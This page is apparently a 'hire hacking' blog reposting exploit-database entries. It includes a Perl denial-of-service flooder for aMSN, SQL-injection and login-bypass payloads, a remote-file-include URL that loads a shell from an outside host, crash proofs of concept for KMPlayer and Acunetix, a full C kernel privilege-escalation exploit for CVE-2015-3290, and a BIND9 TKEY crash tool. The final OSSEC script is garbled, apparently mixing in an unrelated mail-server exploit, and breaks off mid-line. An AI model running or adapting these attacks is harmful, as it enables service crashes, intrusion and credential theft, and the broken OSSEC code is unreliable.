Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863152337

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/55381/info

aMSN is prone to a remote denial-of-service vulnerability.

A successful exploit of this issue allows remote attackers to crash the affected application, denying service to legitimate users. 

#!/usr/bin/perl
use IO::Socket;

$x = 0;
print q(
**************************************
* AMSN REMOTE DOS XPL *
* BY *
* Red-Point *
* red-point@odiameporserelite.org *
**************************************
);

print q(Victim IP: );
$hos = <STDIN>;
chop ($hos);

print q( );
$type = seC0de;
chop ($type);

if($type == seC0de){
 while($x != 9999999){

  $postit = "";
  $lrg = length $postit;
  my $sock = new IO::Socket::INET (
                                 PeerAddr => "$hos",
                                 PeerPort => "6891",
                                 Proto => "tcp",
                                );

  die "\nEl host esta fuera de servicio o no estas conectado a internet $!\n" unless $sock;

  print $sock "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D".
    "\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00".
    "\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44".
    "\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47".
    "\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00".
    "\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48".
    "\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E".
    "\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A".
    "\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49".
    "\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A".
    "\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D".
    "\x49\x48\x44\x52";
  close($sock);
  syswrite STDOUT, "|";
  $x++;
 }
}
else{
        die " \n";
}
HireHackking 
source: https://www.securityfocus.com/bid/55386/info

Sitemax Maestro is prone to SQL-injection and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.

Sitemax Maestro 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1

http://www.example.com/swlang.php?lang=../../datas/users/file.gif%00&redirect=
HireHackking 
source: https://www.securityfocus.com/bid/55387/info

Wiki Web Help is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Wiki Web Help 0.3.11 is vulnerable; other versions may also be affected. 

http://www.example.com/wwh/pages/links.php?configpath=http://www.example2.com/shell.txt?
HireHackking 
source: https://www.securityfocus.com/bid/55390/info

Sciretech Multimedia Manager and Sciretech File Manager are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Sciretech Multimedia Manager 3.0.0 and Sciretech File Manager 3.0.0 are vulnerable; other versions may also be affected. 

Post Data:
dbuser_user_email=admin%40domain.com%27+and+99%3D99--+and+0%3D%270&dbuser_user_password=WILL_BYPASS_IT_LIKE_2X2&login=Login

Example URL:
http://www.example.com/index.php?module=user&content=execute&execute=user_account_activation&user_email=pipi@pipi.com%27%20or%20sleep%2810%29--%20and%205=%275&activation_key=TS0nz4hLVgZ83mrvgtPS
HireHackking

Tendoo CMS 1.3 - Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability # Google Dork: N/A # Date: 28/7/2015 # Exploit Author: Arash Khazaei # Vendor Homepage: http://tendoo.org/ # Software Link: http://sourceforge.net/projects/tendoo-cms/ # Version: 1.3 # Tested on: Kali , Windows # CVE : N/A # Contact : 0xclay@gmail.com ###################### Introduction : a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... . ###################### Stored Xss In http://localhost/tendoo/index.php/account/update In First Name and Last Name Inputs Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile When First Name And Last Name Loads JavaScripts Code Will Be Excuted POC : https://i.leetfil.es/e992ad2d.jpg Discovered By Arash Khazaei
HireHackking

KMPlayer 3.9.x - '.srt' Crash (PoC)

HACKER · %s · %s

#!/usr/bin/perl -w # Title : KMPlayer 3.9.x - Crash Proof Of Concept # Company : http://www.kmplayer.com # Tested : Windows 7 / Windows 8.1 # # # Author : Peyman Motevalli Manesh # Linkedin : https://ir.linkedin.com/in/peymanmotevalli # E-Mail : me[at]PDPnetwork[dot]ir # Website : www.PDPnetwork.ir # FaceBook : https://www.facebook.com/Peyman.Motevalli # # # 1 . run perl code : perl km.pl # 2 . open "kmplayer" # 3 . Load Subtitle (Peyman.srt) # 4 . Crashed $eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14"; $h="\x42"x9850; $poc="\x41"x500000; $poc="$h$poc$eheader"; open (Peyman, '>Peyman.srt'); for ($i=1;$i<=4;$i++){ print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n"; print Peyman $poc; } close (Peyman);
HireHackking

Acunetix Web Vulnerability Scanner 9.5 - Crash (PoC)

HACKER · %s · %s

#!/usr/bin/env python # Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept # Website : https://www.acunetix.com # Tested : win 7 / win 8.1 / win vista # # # Author : Hadi Zomorodi Monavar # Email : zomorodihadi@gmail.com # # 1 . run python code : python poc.py # 2 . open hadi.txt and copy content to clipboard # 3 . open "Acunetix Web Vulnerability Scanner 9.5" # 4 . from Tools Explorer --> subdomain scanner # 5 . Paste ClipBoard on "Domain" # 6 . Click start # 7 . Crashed ;) crash = "\x41"*9000 #B0F file = open("hadi.txt", "w") file.write(crash) file.close()
HireHackking
/* > +++++ CVE-2015-3290 +++++ > > High impact NMI bug on x86_64 systems 3.13 and newer, embargoed. Also fixed by: > > https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a > > The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290. > > You can mitigate CVE-2015-3290 by blocking modify_ldt or > perf_event_open using seccomp. A fully-functional, portable, reliable > exploit is privately available and will be published in a week or two. > *Patch your systems* And here's a real advisory: If an NMI returns via espfix64 and is interrupted during espfix64 setup by another NMI, the return state is corrupt. This is exploitable for reliable privilege escalation on any Linux x86_64 system in which untrusted code can arrange for espfix64 to be invoked and for NMIs to be nested. Glossing over a lot of details, the basic structure of Linux' nested NMI handling is: nmi_handler: if (in_nmi) { nmi_latched = true; return; } in_nmi = true; handle the nmi; atomically (this is magic): if (nmi_latched) { nmi_latched = false; start over; } else { in_nmi = false; return and unmask NMIs; } Alas, on x86_64, there is no reasonable way to block NMIs to run the atomic part of that pseudocode atomically. Instead, the entire atomic piece is implemented by the single instruction IRET. But x86_64 is more broken than just that. The IRET instruction does not restore register state correctly [1] when returning to a 16-bit stack segment. x86_64 has a complicated workaround called espfix64. If espfix64 is invoked on return, a well-behaved IRET is emulated by a complicated scheme that involves manually switching stacks. During the stack switch, there is a window of approximately 19 instructions between the start of espfix64's access to the original stack and when espfix64 is done with the original stack. If a nested NMI occurs during this window, then the atomic part of the basic nested NMI algorithm is observably non-atomic. Depending on exactly where in this window the nested NMI hits, the results vary. Most nested NMIs will corrupt the return context and crash the calling process. Some are harmless except that the nested NMI gets ignored. There is a two-instruction window in which the return context ends up with user-controlled RIP and CS set to __KERNEL_CS. A careful exploit (attached) can recover from all the crashy failures and can regenerate a valid *privileged* state if a nested NMI occurs during the two-instruction window. This exploit appears to work reasonably quickly across a fairly wide range of Linux versions. If you have SMEP, this exploit is likely to panic the system. Writing a usable exploit against a SMEP system would be considerably more challenging, but it's surely possible. Measures like UDEREF are unlikely to help, because this bug is outside any region that can be protected using paging or segmentation tricks. However, recent grsecurity kernels seem to forcibly disable espfix64, so they're not vulnerable in the first place. A couple of notes: - This exploit's payload just prints the text "CPL0". The exploit will keep going after printing CPL0 so you can enjoy seeing the frequency with which it wins. Interested parties could easily write different payloads. I doubt that any existing exploit mitigation techniques would be useful against this type of attack. - If you are using a kernel older than v4.1, a 64-bit build of the exploit will trigger a signal handling bug and crash. Defenders should not rejoice, because the exploit works fine when build as a 32-bit binary or (so I'm told) as an x32 binary. - This is the first exploit I've ever written that contains genuine hexadecimal code. The more assembly-minded among you can have fun figuring out why :) [1] By "correctly", I mean that the register state ends up different from that which was saved in the stack frame, not that the implementation doesn't match the spec in the microcode author's minds. The spec is simply broken (differently on AMD and Intel hardware, perhaps unsurprisingly.) --Andy */ /* * Copyright (c) 2015 Andrew Lutomirski. * GPL v2 * * Build with -O2. Don't use -fno-omit-frame-pointer. * * Thanks to Petr Matousek for pointing out a bug in the exploit. */ #define _GNU_SOURCE #include <stdlib.h> #include <stdio.h> #include <inttypes.h> #include <asm/ldt.h> #include <unistd.h> #include <sys/syscall.h> #include <asm/processor-flags.h> #include <setjmp.h> #include <signal.h> #include <string.h> #include <err.h> /* Abstractions for some 32-bit vs 64-bit differences. */ #ifdef __x86_64__ # define REG_IP REG_RIP # define REG_SP REG_RSP # define REG_AX REG_RAX struct selectors { unsigned short cs, gs, fs, ss; }; static unsigned short *ssptr(ucontext_t *ctx) { struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; return &sels->ss; } static unsigned short *csptr(ucontext_t *ctx) { struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS]; return &sels->cs; } #else # define REG_IP REG_EIP # define REG_SP REG_ESP # define REG_AX REG_EAX # define REG_CR2 (REG_SS + 3) static greg_t *ssptr(ucontext_t *ctx) { return &ctx->uc_mcontext.gregs[REG_SS]; } static greg_t *csptr(ucontext_t *ctx) { return &ctx->uc_mcontext.gregs[REG_CS]; } #endif static char altstack_data[SIGSTKSZ]; static void sethandler(int sig, void (*handler)(int, siginfo_t *, void *), int flags) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = handler; sa.sa_flags = SA_SIGINFO | flags; sigemptyset(&sa.sa_mask); if (sigaction(sig, &sa, 0)) err(1, "sigaction"); } static jmp_buf jmpbuf; static volatile unsigned long expected_rsp; static volatile unsigned int cpl0; static void handler(int sig, siginfo_t *info, void *ctx_void) { ucontext_t *ctx = (ucontext_t*)ctx_void; unsigned long sig_err = ctx->uc_mcontext.gregs[REG_ERR]; unsigned long sig_trapno = ctx->uc_mcontext.gregs[REG_TRAPNO]; char errdesc[64] = ""; if (sig_trapno == 14) { strcpy(errdesc, " "); if (sig_err & (1 << 0)) strcat(errdesc, "PRESENT "); if (sig_err & (1 << 1)) strcat(errdesc, "WRITE "); if (sig_err & (1 << 2)) strcat(errdesc, "USER "); sprintf(errdesc + strlen(errdesc), "at 0x%llX", (unsigned long long)ctx->uc_mcontext.gregs[REG_CR2]); } else if (sig_err != 0) { const char *src = (sig_err & 1) ? " EXT" : ""; const char *table; if ((sig_err & 0x6) == 0x0) table = "GDT"; else if ((sig_err & 0x6) == 0x4) table = "LDT"; else if ((sig_err & 0x6) == 0x2) table = "IDT"; else table = "???"; sprintf(errdesc, " %s%s index %lu, ", table, src, sig_err >> 3); } char trapname[32]; if (sig_trapno == 13) strcpy(trapname, "GP"); else if (sig_trapno == 11) strcpy(trapname, "NP"); else if (sig_trapno == 12) strcpy(trapname, "SS"); else if (sig_trapno == 14) strcpy(trapname, "PF"); else if (sig_trapno == 32) strcpy(trapname, "IRET"); /* X86_TRAP_IRET */ else sprintf(trapname, "%lu", sig_trapno); printf("+ State was corrupted: %s #%s(0x%lx%s)\n", (sig == SIGSEGV ? "SIGSEGV" : "SIGTRAP"), trapname, (unsigned long)sig_err, errdesc); if (cpl0) { printf(" CPL0\n"); cpl0 = 0; } if (!(ctx->uc_mcontext.gregs[REG_EFL] & X86_EFLAGS_IF)) printf(" RFLAGS = 0x%llX (interrupts disabled)\n", (unsigned long long)ctx->uc_mcontext.gregs[REG_EFL]); if (ctx->uc_mcontext.gregs[REG_SP] != expected_rsp) printf(" RSP = 0x%016llX\n", (unsigned long long)ctx->uc_mcontext.gregs[REG_SP]); unsigned short normal_ss; asm ("mov %%ss, %0" : "=rm" (normal_ss)); if (*ssptr(ctx) != 0x7 && *ssptr(ctx) != normal_ss) printf(" SS = 0x%hX\n", *ssptr(ctx)); siglongjmp(jmpbuf, 1); } static void set_ldt(void) { /* Boring 16-bit data segment. */ const struct user_desc data_desc = { .entry_number = 0, .base_addr = 0, .limit = 0xfffff, .seg_32bit = 0, .contents = 0, /* Data, expand-up */ .read_exec_only = 0, .limit_in_pages = 0, .seg_not_present = 0, .useable = 0 }; if (syscall(SYS_modify_ldt, 1, &data_desc, sizeof(data_desc)) != 0) err(1, "modify_ldt"); } int main(int argc, char **argv) { static unsigned short orig_ss; /* avoid RSP references */ set_ldt(); sethandler(SIGSEGV, handler, SA_ONSTACK); sethandler(SIGTRAP, handler, SA_ONSTACK); stack_t stack = { .ss_sp = altstack_data, .ss_size = SIGSTKSZ, }; if (sigaltstack(&stack, NULL) != 0) err(1, "sigaltstack"); printf("If I produce no output, then either your kernel is okay\n" "or you didn't abuse perf appropriately.\n" "Run me under heavy perf load. For example:\n" "perf record -g -o /dev/null -e cycles -e instructions -c 10000 %s\n", argv[0]); if (sizeof(void *) != 4) { printf("*** WARNING *** A 64-bit build of this exploit will not\n" " work correctly on kernels before v4.1 due to\n" " a signal handling bug. Build for 32-bit\n" " or x32 instead\n"); } sigsetjmp(jmpbuf, 1); asm volatile ("mov %%ss, %0" : "=rm" (orig_ss)); while (1) { #ifdef __x86_64__ asm volatile ( /* A small puzzle for the curious reader. */ "mov $2048, %%rbp \n\t" /* Save rsp for diagnostics */ "mov %%rsp, %[expected_rsp] \n\t" /* * Let 'er rip. */ "mov %[ss], %%ss \n\t" /* begin corruption */ "movl $1000, %%edx \n\t" "1: decl %%edx \n\t" "jnz 1b \n\t" "mov %%ss, %%eax \n\t" /* grab SS to display */ /* Did we enter CPL0? */ "mov %%cs, %%dx \n\t" "testw $3, %%dx \n\t" "jnz 2f \n\t" "incl cpl0(%%rip) \n\t" "leaq 3f(%%rip), %%rcx \n\t" "movl $0x200, %%r11d \n\t" "sysretq \n\t" "2: \n\t" /* * Stop further corruption. We need to check CPL * first because we need RPL == CPL. */ "mov %[orig_ss], %%ss \n\t" /* end corruption */ "subq $128, %%rsp \n\t" "pushfq \n\t" "testl $(1<<9),(%%rsp) \n\t" "addq $136, %%rsp \n\t" "jz 3f \n\t" "cmpl %[ss], %%eax \n\t" "je 4f \n\t" "3: int3 \n\t" "4: \n\t" : [expected_rsp] "=m" (expected_rsp) : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) : "rax", "rcx", "rdx", "rbp", "r11", "flags" ); #else asm volatile ( /* A small puzzle for the curious reader. */ "mov %%ebp, %%esi \n\t" "mov $2048, %%ebp \n\t" /* Save rsp for diagnostics */ "mov %%esp, %[expected_rsp] \n\t" /* * Let 'er rip. */ "mov %[ss], %%ss \n\t" /* begin corruption */ "movl $1000, %%edx \n\t" "1: .byte 0xff, 0xca \n\t" /* decl %edx */ "jnz 1b \n\t" "mov %%ss, %%eax \n\t" /* grab SS to display */ /* Did we enter CPL0? */ "mov %%cs, %%dx \n\t" "testw $3, %%dx \n\t" "jnz 2f \n\t" ".code64 \n\t" "incl cpl0(%%rip) \n\t" "leaq 3f(%%rip), %%rcx \n\t" "movl $0x200, %%r11d \n\t" "sysretl \n\t" ".code32 \n\t" "2: \n\t" /* * Stop further corruption. We need to check CPL * first because we need RPL == CPL. */ "mov %[orig_ss], %%ss \n\t" /* end corruption */ "pushf \n\t" "testl $(1<<9),(%%esp) \n\t" "addl $4, %%esp \n\t" "jz 3f \n\t" "cmpl %[ss], %%eax \n\t" "je 4f \n\t" "3: int3 \n\t" "4: mov %%esi, %%ebp \n\t" : [expected_rsp] "=m" (expected_rsp) : [ss] "r" (0x7), [orig_ss] "m" (orig_ss) : "eax", "ecx", "edx", "esi", "flags" ); #endif /* * If we ended up with IF == 0, there's no easy way to fix * it. Instead, make frequent syscalls to avoid hanging * the system. */ syscall(0x3fffffff); } }
HireHackking

ISC BIND 9 - TKEY (PoC)

HACKER · %s · %s

/* PoC for BIND9 TKEY assert Dos (CVE-2015-5477) Usage: tkill <hostname> What it does: - First sends a "version" query to see if the server is up. - Regardless of the version response, it then sends the DoS packet. - Then it waits 5 seconds for a response. If the server crashes, there will be no response. Notes: - multiple hostnames can be specified on the command-line - IP addresses can be specified instead of hostnames - supports IPv4 and IPv6 - runs on Linux, Mac, and Windows (cygwin or VisualStudio) - if a hostname resolves to more than one IP, then all IPs will be probed About the vuln: For control information, the "TSIG" feature allows packets to be signed with a password. This allows slave servers to get updates from master servers without a MitM attack (like from the NSA) changing the data on the network. A password can be distributed out of band, such as SSHing into a box and editing the configuration file. Anther way is through public-keys. That's the "TKEY" feature: it distributes new TSIG passwords using public-keys. When processing a TKEY packet, the code will call a function to fetch the proper TKEY record. It looks in two places: the "answer records" section, and the "additional records" section. If it can't find it in the "additional", it looks in "answer". The lookup function takes a parameter that is initially set to NULL. During the failed lookup in the "additional" section, it may set that parameter to a non-null value. Since a non-null value is passed in again during the second lookup in the "answer" section, the code crashes. The patch was to set the variable to NULL before the second lookup. The correct fix would simply not check to see if the parameter was NULL to be begin with. It's an out-only parameter, so it's value on input doesn't matter. This is a just a "brainfart" bug that can only result in a crash of the server. It cann't result in data-corruption or code execution. About this code: To learn about writing network code, this is probably something useful to study. It works on both Windows and Unix (Linux, Mac, etc.). You can see where the differences are between the two platforms, as well as the simularities. It works on both IPv4 and IPv6. However, if you search through the code, you'll find nothing that specifically references either version. It's magically dual-stack. That's because it uses new functions like "getaddrinfo()" instead of old functions like "gethostbyname()". */ #include <stdio.h> #include <string.h> #include <ctype.h> #ifdef WIN32 #include <winsock2.h> #include <ws2tcpip.h> #pragma comment(lib, "Ws2_32.lib") #define WSA(err) (WSA##err) #define WSAEAGAIN WSAETIMEDOUT #else #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #define WSAGetLastError() (errno) #define WSA(err) (err) #define closesocket(fd) close(fd) #endif /* * DoS packet that will crash server */ static const unsigned char dospacket[] = { 0x01, 0x02, /* xid */ 0x01, 0x00, /* query */ 0x00, 0x01, /* one question */ 0x00, 0x00, /* no answer */ 0x00, 0x00, /* no authorities */ 0x00, 0x01, /* one additional: must be 'additional' section to work*/ /* Query name */ 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, 0x00, 249, /* TKEY record type */ 0x00, 255, /* Additional record */ 0x03, 'f', 'o', 'o', 0x03, 'b', 'a', 'r', 0x00, /* name: must be same as query */ 0x00, 16, /* record type: must NOT be 249/TKEY */ 0x00, 255, 0, 0, 0, 0, 0, 51, 50, 'h', 't', 't', 'p', 's', ':', '/', '/', 'g', 'i', 't', 'h', 'u', 'b', '.', 'c', 'o', 'm', '/', 'r', 'o', 'b', 'e', 'r', 't', 'd', 'a', 'v', 'i', 'd', 'g', 'r', 'a', 'h', 'a', 'm', '/', 'c', 'v', 'e', '-', '2', '0', '1', '5', '-', '5', '4', '7', '7' }; /* * Packet for querying the version of the server, to test if it's up */ static const unsigned char versionpacket[] = { 0x03, 0x04, /* xid */ 0x01, 0x00, /* query */ 0x00, 0x01, /* one question */ 0x00, 0x00, /* no answer */ 0x00, 0x00, /* no authorities */ 0x00, 0x00, /* no additional */ /* Query name */ 0x07, 'v', 'e', 'r', 's', 'i', 'o', 'n', 0x04, 'b', 'i', 'n', 'd', 0x00, 0x00, 16, /* TXT */ 0x00, 3, /* CHOAS */ }; /* * YOLO BIND version.bind query */ int query_version(int fd, const struct addrinfo *target) { int bytes_received; int i; struct sockaddr_storage from; socklen_t sizeof_from = sizeof(from); char hostname[256]; unsigned char buf[2048]; int result = 0; /* * Query version */ sendto(fd, (const char*)versionpacket, sizeof(versionpacket), 0, target->ai_addr, target->ai_addrlen); /* * get response */ again: bytes_received = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from); if (bytes_received <= 0 && WSAGetLastError() == WSA(EAGAIN)) { fprintf(stderr, "[-] timed out getting version, trying again\n"); return 0; } else if (bytes_received <= 0) { fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError()); return 0; } getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST); /* * parse response */ if (bytes_received < 12) goto again; if (buf[0] != versionpacket[0] && buf[1] != versionpacket[1]) goto again; if ((buf[2]&0x80) != 0x80) goto again; /* * Handle respoonse code */ switch (buf[3]&0x0F) { case 0: /* parse packet below */ break; case 1: fprintf(stderr, "[-] %s: FORMERR\n", hostname); return 1; case 2: fprintf(stderr, "[-] %s: SRVFAIL\n", hostname); return 1; case 3: fprintf(stderr, "[-] %s: NAMERR\n", hostname); return 1; case 4: fprintf(stderr, "[-] %s: NOTIMPL\n", hostname); return 1; case 5: fprintf(stderr, "[-] %s: REFUSED\n", hostname); return 1; default: fprintf(stderr, "[-] %s: unknown error: %u\n", hostname, buf[3]); return 1; } i = 12; /* skip header */ /* * skip query name */ while (i < bytes_received) { if (buf[i] == 0) { i++; break; } else if ((buf[i] & 0xC0) == 0xC0) { i += 2; break; } else { i += buf[i] + 1; } } i += 4; /* * process all answers */ while (i + 12 <= bytes_received) { int t, c, len; /* skip answer name */ while (i < bytes_received) { if (buf[i] == 0) { i++; break; } else if ((buf[i] & 0xC0) == 0xC0) { i += 2; break; } else { i += buf[i] + 1; } } /* extract resource-recorder header */ if (i + 10 > bytes_received) break; t = buf[i+0]<<8 | buf[i+1]; c = buf[i+2]<<8 | buf[i+3]; len = buf[i+8]<<8 | buf[i+9]; i += 10; /* verify TXT CHAOS */ if (t != 16 || c != 3) { i += len; continue; } /* fix len */ if (len > bytes_received - i) len = bytes_received - i; /* print the hostname */ fprintf(stderr, "[+] %s: ", hostname); /* print the strings */ { int j = i; i += len; while (j < i) { int len2 = buf[j]; int k; j++; if (len2 > bytes_received - len2) len2 = bytes_received - len2; fprintf(stderr, "\""); for (k=j; k<j+len2; k++) { if (buf[k] == '\\') fprintf(stderr, "\\"); else if (!isprint(buf[k])) fprintf(stderr, "\\x%02x", buf[k]); else fprintf(stderr, "%c", buf[k]); } j = k; fprintf(stderr, "\" "); } fprintf(stderr, "\n"); } result = 1; } return result; } /* * Send the DoS packet */ void probe(const struct addrinfo *target) { int fd; int x; int i; char hostname[256]; char buf[2048]; struct sockaddr_storage from; socklen_t sizeof_from = sizeof(from); /* * Print status */ getnameinfo(target->ai_addr, target->ai_addrlen, hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST); fprintf(stderr, "[+] %s: Probing...\n", hostname); /* * Create a socket */ fd = socket(target->ai_family, SOCK_DGRAM, 0); if (fd <= 0) { fprintf(stderr, "[-] failed: socket(): %u\n", WSAGetLastError()); return; } /* * Set the timeout to 5-seconds */ { #ifdef WIN32 int milliseconds = 5000; x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&milliseconds, sizeof(milliseconds)); #else struct timeval t; t.tv_sec = 5; t.tv_usec = 0; x = setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, (char*)&t, sizeof(t)); #endif if (x != 0) { fprintf(stderr, "[-] err setting recv timeout: %u\n", WSAGetLastError()); } } /* * First, query the server to grab its version, but also to see it's up */ fprintf(stderr, "[+] Querying version...\n"); for (i=0; i<3; i++) { if (query_version(fd, target)) break; if (i == 2) { fprintf(stderr, "[-] Can't query server, is it crashed already?\n"); fprintf(stderr, "[-] Sending exploit anyway.\n"); } } /***************** * SEND DoS PACKET *****************/ fprintf(stderr, "[+] Sending DoS packet...\n"); sendto(fd, (const char*)dospacket, sizeof(dospacket), 0, target->ai_addr, target->ai_addrlen); /* Grab response */ fprintf(stderr, "[+] Waiting 5-sec for response...\n"); for (;;) { x = recvfrom(fd, (char*)buf, sizeof(buf), 0, (struct sockaddr*)&from, &sizeof_from); if (x <= 0 && WSAGetLastError() == WSA(EAGAIN)) { fprintf(stderr, "[+] timed out, probably crashed\n"); break; } else if (x <= 0) { fprintf(stderr, "[-] unknown error receiving response: %u\n", WSAGetLastError()); break;; } if (x > 2 && (buf[0] != dospacket[0] || buf[1] != dospacket[1])) continue; getnameinfo((struct sockaddr*)&from, sizeof(from), hostname, sizeof(hostname), NULL, 0, NI_NUMERICHOST); fprintf(stderr, "[-] %s: got response, so probably not vulnerable\n", hostname); break; } closesocket(fd); } /* * The main function just parses the arguments and looks up IP addrsses * before calling the "probe" function to actually exploit the targets */ int main(int argc, char *argv[]) { int i; #ifdef WIN32 {WSADATA x; WSAStartup(0x101, &x);} #endif fprintf(stderr, "--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---\n"); if (argc <= 1) { fprintf(stderr, "[-] no host specified\n"); fprintf(stderr, "usage:\n tkill <hostname>\n"); return -1; } /* * Query all targets specified on the command line */ for (i=1; i<argc; i++) { const char *hostname = argv[i]; struct addrinfo *info; struct addrinfo *target; char oldtarget[256] = ""; int x; /* * Lookup the name of the target */ fprintf(stderr, "[+] %s: Resolving to IP address\n", hostname); x = getaddrinfo(hostname, "53", 0, &info); if (x != 0) { fprintf(stderr, "[-] %s: failed: %s\n", hostname, gai_strerror(x)); continue; } if (info->ai_next) { fprintf(stderr, "[+] %s: Resolved to multiple IPs (NOTE)\n", hostname); } /* * Since a name can return multiple IP addresses, * send a probe to all the results */ for (target=info; target; target = target->ai_next) { char newtarget[256]; /* bah, stupid bug in Linux gets the same target multiple * times */ getnameinfo(target->ai_addr, target->ai_addrlen, newtarget, sizeof(newtarget), NULL, 0, NI_NUMERICHOST); if (strcmp(newtarget, oldtarget) == 0) continue; memcpy(oldtarget, newtarget, sizeof(oldtarget)); probe(target); printf("\n"); } /* * Cleanup */ freeaddrinfo(info); } return 0; }
HireHackking
#------------------------------------------------------------------------------------------# # Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure # # Date: Jul 30 2015 # # Exploit Author: Dustin Dörr # # Vendor Homepage: https://www.froxlor.org/ # # Version: <= 0.9.33.1 # #------------------------------------------------------------------------------------------# An unauthenticated remote attacker is able to get the Froxlor MySQL password and username via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version 0.9.33.1 and earlier. The plain MySQL password and username may be stored in the /logs/sql-error.log file. This directory is publicly reachable by default. some default URLs are: - http://example.com/froxlor/logs/sql-error.log - http://cp.example.com/logs/sql-error.log - http://froxlor.example.com/logs/sql-error.log the certain section looks like this: /var/www/froxlor/lib/classes/database/class.Database.php(279): PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array) please note that the password in the logfile is truncated to 15 chars, therefore passwords longer than 15 chars are not fully visible to an attacker.
HireHackking

OSSEC WUI 0.8 - Denial of Service

HACKER · %s · %s

########################################################### # Exploit Title: [OSSEC] # Date: [2015-08-01] # Exploit Author: [Milad Saber] # Vendor Homepage: [www.ossec.net] # Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz] # Version: [0.8] # Tested on: [OSSEC Manager] # Exploit for DOS ossec server. # Please install ossec server and WUI 0.8 and run this exploit ########################################################## import socket import sys import time # specify payload payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root user = 'root' pwd = 'var' if len(sys.argv) != 2: sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0]) sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0]) sys.exit(1) ip = sys.argv[1] def recv(s): s.recv(1024) time.sleep(0.2) try: print "[+]Connecting to milad exploit ..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,4555)) s.recv(1024) s.send(user + "\n") s.recv(1024) s.send(pwd + "\n") s.recv(1024) print "[+]Creating user..." s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n") s.recv(1024) s.send("quit\n") s.close() print "[+]Connecting to SMTP server..." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip,25,80)) s.send("hello milad@milad.pl\r\n") recv(s) print "[+]Sending payload..." s.send("mail from: <'@milad.pl>\r\n") recv(s) # also try s.send("rcpt to: 